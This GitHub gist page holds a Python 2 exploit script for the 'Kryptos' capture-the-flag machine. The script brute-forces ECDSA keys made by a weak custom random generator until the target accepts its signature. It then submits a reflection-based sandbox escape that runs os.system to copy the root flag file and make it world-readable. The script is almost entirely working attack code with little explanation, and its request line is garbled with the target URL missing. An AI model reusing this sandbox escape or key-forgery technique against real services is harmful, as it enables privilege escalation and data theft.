Skip to content

Instantly share code, notes, and snippets.

Created Apr 28, 2019
What would you like to do?
Getting root access on kryptos by abusing weak prng and python reflection
import random
import json
import hashlib
import binascii
from ecdsa import VerifyingKey, SigningKey, NIST384p
from bottle import route, run, request, debug
from bottle import hook
from bottle import response as resp
import sys
import requests
def secure_rng(seed):
# Taken from the internet - probably secure
p = 2147483647
g = 2255412
keyLength = 32
ret = 0
ths = round((p-1)/2)
for i in range(keyLength*8):
seed = pow(g,seed,p)
if seed > ths:
ret += 2**i
return ret
def verify(msg, sig):
return vk.verify(binascii.unhexlify(sig), msg)
return False
def sign(msg):
return binascii.hexlify(sk.sign(msg))
print "[+] Signing expression.."
expr = "[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').system('cp /root/root.txt /tmp/xct && chmod 777 /tmp/xct')"
proxies = {'http': "http://localhost:9090"}
response = 'Bad signature'
print "Bruting.."
while response == 'Bad signature':
seed = random.getrandbits(128)
rand = secure_rng(seed) + 1
sk = SigningKey.from_secret_exponent(rand, curve=NIST384p)
vk = sk.get_verifying_key()
sig = sign(expr)
r ='', json={'expr': expr, 'sig': sig}, proxies=proxies)
response = r.text
print r.text
print seed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment